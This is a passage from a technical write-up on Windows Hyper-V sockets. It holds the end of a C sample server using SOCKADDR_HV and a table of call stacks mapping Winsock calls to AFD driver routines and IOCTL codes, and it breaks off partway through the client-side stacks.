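        printf("bind/listen failed: %d\n", WSAGetLastError());
        closesocket(ls);
        goto out;
    }
    cs = accept(ls, (struct sockaddr *)&peer, &peer_len);
    if (cs != INVALID_SOCKET) {
        n = recv(cs, buf, sizeof(buf) - 1, 0);
        if (n > 0) { buf[n] = '\0'; printf("received: %s\n", buf); }
        closesocket(cs);
    }
    closesocket(ls);
out:
    WSACleanup();
    return n;
}
#endif

int main(void)
{
#ifdef _WIN32
    return hv_server_once(EXAMPLE_SERVICE_GUID) > 0 ? 0 : 1;
#else
    SOCKADDR_HV a;
    if (hv_make_sockaddr(HV_GUID_CHILDREN_STR, EXAMPLE_SERVICE_GUID, &a) != 0)
        return 1;
    printf("SOCKADDR_HV is %u bytes, family %u\n",
           (unsigned)sizeof(a), (unsigned)a.Family);
    return 0;
#endif
}
```

When a client in a child VM connects to the registered ServiceId, the same SOCKADDR_HV layout is used on its side with the host's VmId (or the HV_GUID_PARENT wildcard) in place of HV_GUID_CHILDREN.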
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, the logic of interaction (from the point of view of interaction with the Windows kernel) looks as follows:</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="312"></col><col width="293"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Server</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Client</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12003)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!bind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!bind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1200b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!listen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!listen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdWaitForListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1200c)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile (\Device\Afd\Endpoint)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
